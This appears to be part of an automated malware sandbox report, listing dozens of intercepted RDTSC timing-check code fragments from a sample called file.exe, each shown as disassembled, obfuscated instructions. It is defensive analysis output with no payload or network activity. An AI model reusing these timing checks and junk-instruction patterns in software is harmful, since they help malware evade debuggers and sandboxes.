                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DA2A second address: 91DA5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FB8B0B4B6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DA5D second address: 91DA67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DA67 second address: 91DA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F9B3 second address: 93F9BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8FB915C646h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E67E second address: 93E6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8FB8B0B4AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8FB8B0B4ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F8FB8B0B4A6h 0x00000018 jno 00007F8FB8B0B4A6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E6AD second address: 93E6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E902 second address: 93E906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E906 second address: 93E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8FB915C646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F8FB915C64Dh 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E921 second address: 93E929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E929 second address: 93E92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E92D second address: 93E955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B1h 0x00000007 jmp 00007F8FB8B0B4AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007F8FB8B0B4A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E955 second address: 93E978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F8FB915C64Bh 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E978 second address: 93E997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB8B0B4B2h 0x00000009 popad 0x0000000a jnl 00007F8FB8B0B4B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93236F second address: 93238A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8FB915C646h 0x0000000a jmp 00007F8FB915C651h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93238A second address: 93238E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F2DA second address: 93F2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 js 00007F8FB915C646h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F594 second address: 93F59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F59A second address: 93F5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Ah 0x00000009 popad 0x0000000a jmp 00007F8FB915C653h 0x0000000f pushad 0x00000010 jmp 00007F8FB915C64Ch 0x00000015 pushad 0x00000016 popad 0x00000017 jns 00007F8FB915C646h 0x0000001d jmp 00007F8FB915C659h 0x00000022 popad 0x00000023 ja 00007F8FB915C656h 0x00000029 jmp 00007F8FB915C64Ah 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9441E1 second address: 9441F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8FB8B0B4A6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F8FB8B0B4A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9461E2 second address: 946201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8FB915C64Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946671 second address: 946677 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946677 second address: 94667E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A3A second address: 946A5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8FB8B0B4B8h 0x00000008 jmp 00007F8FB8B0B4B2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A5C second address: 946A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A568 second address: 94A572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8FB8B0B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A572 second address: 94A586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8FB915C64Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F8FB915C646h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A586 second address: 94A59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB8B0B4AEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A59A second address: 94A59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A2C5 second address: 94A2CF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8FB8B0B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A2CF second address: 94A2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D48F second address: 94D495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DF7A second address: 94DF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8FB915C646h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E067 second address: 94E07D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F8FB8B0B4A6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E07D second address: 94E08B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E08B second address: 94E0A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB8B0B4B6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E39B second address: 94E39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E432 second address: 94E437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E437 second address: 94E43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E43D second address: 94E454 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F8FB8B0B4ACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E454 second address: 94E458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E458 second address: 94E4A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F8FB8B0B4ABh 0x0000000f jmp 00007F8FB8B0B4B2h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F8FB8B0B4B4h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E96D second address: 94E986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C655h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E986 second address: 94E98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E98A second address: 94E9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F8FB915C648h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 pushad 0x00000027 mov di, si 0x0000002a xor ebx, 67D641D8h 0x00000030 popad 0x00000031 call 00007F8FB915C64Eh 0x00000036 mov dword ptr [ebp+122D1B0Dh], ebx 0x0000003c pop ebx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 jmp 00007F8FB915C657h 0x00000045 push eax 0x00000046 jp 00007F8FB915C650h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F3B3 second address: 94F3B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F3B9 second address: 94F3C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950469 second address: 950493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FB8B0B4AFh 0x00000008 jne 00007F8FB8B0B4A6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8FB8B0B4ABh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950D0D second address: 950D30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F8FB915C64Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950D30 second address: 950D3A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8FB8B0B4ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952B25 second address: 952B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952B2A second address: 952B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC37 second address: 90DC4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC4B second address: 90DC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC51 second address: 90DC84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8FB915C64Fh 0x00000010 jmp 00007F8FB915C656h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9569C0 second address: 9569C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9569C7 second address: 9569D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8FB915C646h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A24D second address: 95A252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A252 second address: 95A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95926B second address: 95926F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C277 second address: 95C281 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C281 second address: 95C333 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB8B0B4A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F8FB8B0B4B3h 0x00000013 jmp 00007F8FB8B0B4AFh 0x00000018 popad 0x00000019 nop 0x0000001a mov bx, si 0x0000001d push dword ptr fs:[00000000h] 0x00000024 jmp 00007F8FB8B0B4ADh 0x00000029 mov di, AB63h 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F8FB8B0B4A8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e add dword ptr [ebp+1245563Fh], edi 0x00000054 mov eax, dword ptr [ebp+122D0F01h] 0x0000005a mov dword ptr [ebp+122D25C2h], eax 0x00000060 push FFFFFFFFh 0x00000062 mov edi, dword ptr [ebp+122D398Eh] 0x00000068 js 00007F8FB8B0B4ACh 0x0000006e mov dword ptr [ebp+122D2B2Eh], edx 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 push ebx 0x00000078 jmp 00007F8FB8B0B4B2h 0x0000007d pop ebx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C333 second address: 95C358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FB915C651h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F11A second address: 95F11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960228 second address: 96022C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96022C second address: 960232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960232 second address: 960238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960238 second address: 9602D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F8FB8B0B4A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F8FB8B0B4A8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 push esi 0x00000043 mov bh, F9h 0x00000045 pop ebx 0x00000046 jng 00007F8FB8B0B4ACh 0x0000004c mov dword ptr [ebp+122D1C31h], edx 0x00000052 push 00000000h 0x00000054 jmp 00007F8FB8B0B4B6h 0x00000059 mov ebx, 4389436Ah 0x0000005e push eax 0x0000005f jbe 00007F8FB8B0B4BFh 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F8FB8B0B4B1h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9612E3 second address: 961370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C656h 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F8FB915C648h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F8FB915C659h 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D274Dh], esi 0x00000036 xchg eax, esi 0x00000037 jmp 00007F8FB915C651h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F8FB915C659h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961370 second address: 961376 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962327 second address: 962342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C657h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962342 second address: 9623C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F8FB8B0B4A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007F8FB8B0B4B6h 0x0000002d push 00000000h 0x0000002f sub dword ptr [ebp+122D1D87h], edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F8FB8B0B4A8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push edx 0x00000052 add edi, dword ptr [ebp+122D398Ah] 0x00000058 pop ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9614C3 second address: 9614C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96040F second address: 960413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9614C9 second address: 9614CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96321F second address: 96322B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960413 second address: 960423 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EA5 second address: 9A5EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5EA9 second address: 9A5EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8FB8B0B4B7h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8FB8B0B4B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8DC second address: 90F915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C656h 0x00000007 jmp 00007F8FB915C657h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F8FB915C648h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F915 second address: 90F91B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8B1B second address: 9A8B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0F7 second address: 9AC0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0FD second address: 9AC103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC3AC second address: 9AC3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F8FB8B0B4A6h 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F8FB8B0B4B8h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC3D5 second address: 9AC3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F8FB915C64Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
